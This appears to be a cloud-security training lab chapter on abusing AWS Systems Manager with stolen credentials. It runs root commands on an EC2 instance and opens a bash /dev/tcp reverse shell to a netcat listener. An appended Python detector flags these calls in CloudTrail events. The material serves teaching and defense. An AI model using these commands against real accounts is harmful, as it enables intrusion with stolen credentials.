# AWS EC2 Reverse Shell via SSM

## Introduction

AWS Systems Manager (SSM) is an AWS service that lets administrators manage resources from the AWS CLI or Console by interacting with an agent that runs on those resources.

Through SSM we can execute commands, open a shell session from the console UI, deploy updates, take backups and perform other administrative tasks.

As an attacker, we can (ab)use SSM to obtain a reverse shell on the `compute-target`, which lets us inspect its file system and reach whatever network it can see.

## What are we going to cover?

We will use the stolen credentials from the previous chapter to execute a shell script on the `compute-target`. This script gives us command execution through a reverse shell that connects back to our attacker machine.

## Executing commands on the target

We will now run a command on the `compute-target` EC2 instance using the AWS SSM service, accessed with the stolen credentials.

First, enumerate the instances that have the SSM agent registered, using the command below.

```
aws ssm describe-instance-information --profile stolencreds
```

![describe instance information](/files/VPRuSonH0gfb3KBSLNmY)

Note the instance ID of the machine which we will use to perform command execution using SSM.

Using the instance ID from the `describe-instance-information` output above, run the following commands:

* Use the AWS SSM `send-command` to send a command to the instance and return the command ID, which we need in order to read the command's output.

```
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
```

![ssm ifconfig](/files/MT9rrwKt9WjLbNvJB3Jb)

* Next, use the AWS SSM `list-command-invocations` with that command ID to read the output of `ifconfig`.

```
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds
```

![ssm command output](/files/McPdSUrphVbf43eyBRYV)

Remember that the AWS SSM agent runs as root/administrator on the EC2 instance, so any command you run through SSM executes with administrative privileges.

## Reverse shell using inline script

Since SSM lets us execute commands, we can use it to obtain a shell on the remote system. The `AWS-RunRemoteScript` document can execute a script hosted on GitHub or in an S3 bucket; the steps below instead pass the script inline through `AWS-RunShellScript`.

**Run these commands from the student machine**

* **On the attacker machine**, via an SSH terminal, run the command below to add an iptables rule that allows inbound traffic to port 9999:

```
sudo iptables -I INPUT -p tcp -m tcp --dport 9999 -j ACCEPT
```

* **On the attacker machine** that will catch the reverse shell, start `netcat` listening with the command below:

```
nc -nlvp 9999
```

* **Back on the student machine**, run the following command, replacing `ATTACKER-INTERNAL-IP` with the private IP address of the attacker machine and `INSTANCE-ID` with the target's instance ID. The attacker machine and the compute target can reach each other because they are in the same VPC.

```
aws ssm send-command --instance-ids "INSTANCE-ID" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters 'commands="bash -c \"bash -i >& /dev/tcp/ATTACKER-INTERNAL-IP/9999 0>&1\""' --output text --query "Command.CommandId" --profile stolencreds
```

* A reverse shell should now have connected to the `netcat` listener.

![reverse shell received](/files/qmr8zFvs2jk35ZSa0Ruc)
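From the defender's side, the whole chain above is visible in CloudTrail as `ssm:SendCommand` calls. The following added example (not part of the original lab) runs a small detection over constructed CloudTrail-style events: it flags command-execution documents used by principals outside an allow-list and, where the command text is present, the `/dev/tcp` reverse-shell pattern used in this chapter. The event field layout, the principal ARNs and the instance ID are assumptions made for the example.

```python
import re
from typing import Dict, List

# Principals expected to run SSM commands here (constructed; take this from your own inventory).
EXPECTED_PRINCIPALS = {"arn:aws:iam::111122223333:role/ops-automation"}
# SSM documents that execute arbitrary commands as root/SYSTEM on the instance.
EXEC_DOCUMENTS = {"AWS-RunShellScript", "AWS-RunPowerShellScript", "AWS-RunRemoteScript"}
# Pattern of the inline bash reverse shell shown in this chapter.
REVERSE_SHELL_RE = re.compile(r"/dev/tcp/|bash\s+-i\b")

def ct_event(actor: str, name: str, doc: str = "", comment: str = "", params=None) -> Dict:
    """Build a constructed, simplified CloudTrail-style event (field layout is an assumption)."""
    req = {"documentName": doc, "instanceIds": ["i-0EXAMPLE"], "comment": comment, "parameters": params} if doc else None
    return {"eventSource": "ssm.amazonaws.com", "eventName": name,
            "userIdentity": {"arn": actor}, "requestParameters": req}

OPS = "arn:aws:iam::111122223333:role/ops-automation"
THIEF = "arn:aws:iam::111122223333:user/stolencreds"
SAMPLE_EVENTS = [
    ct_event(OPS, "SendCommand", "AWS-RunShellScript", "patching", {"commands": ["yum check-update"]}),
    ct_event(THIEF, "DescribeInstanceInformation"),
    ct_event(THIEF, "SendCommand", "AWS-RunShellScript", "IP Config",
             {"commands": ['bash -c "bash -i >& /dev/tcp/10.0.1.5/9999 0>&1"']}),
    # Some deployments mask parameters; the detection must still fire on document + principal.
    ct_event(THIEF, "SendCommand", "AWS-RunShellScript", "IP Config", "HIDDEN"),
]

def classify(event: Dict) -> List[str]:
    """Return findings for one event; an empty list means nothing suspicious."""
    if event.get("eventSource") != "ssm.amazonaws.com" or event.get("eventName") != "SendCommand":
        return []
    findings = []
    req = event.get("requestParameters") or {}
    actor = event.get("userIdentity", {}).get("arn", "")
    doc = req.get("documentName", "")
    if doc in EXEC_DOCUMENTS and actor not in EXPECTED_PRINCIPALS:
        findings.append(f"unexpected principal {actor} used {doc}")
    # The comment field is caller-chosen ("IP Config" above), so never trust it as a description.
    params = req.get("parameters")
    if isinstance(params, dict):
        commands = " ".join(params.get("commands", []))
        if REVERSE_SHELL_RE.search(commands):
            findings.append(f"reverse-shell pattern in command: {commands}")
    elif doc in EXEC_DOCUMENTS:
        findings.append("command text not in event; fetch it with ssm list-command-invocations")
    return findings

def scan(events: List[Dict]) -> List[str]:
    """Run classify() over a batch of events and return all findings in order."""
    return [f for e in events for f in classify(e)]
```

Calling `scan(SAMPLE_EVENTS)` returns four findings: two for the inline reverse shell and two for the masked-parameter call, while the ops role's patch check and the enumeration call produce none.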

## Additional references

* [Reference for the send-command](https://docs.aws.amazon.com/cli/latest/reference/ssm/send-command.html)
* [Running Scripts from Amazon S3](https://docs.aws.amazon.com/systems-manager/latest/userguide/integration-s3.html)
* [Remotely Run Commands on an EC2 Instance with AWS Systems Manager](https://aws.amazon.com/getting-started/hands-on/remotely-run-commands-ec2-instance-systems-manager/)
* [Getting shell and data access in AWS by chaining vulnerabilities](https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed)

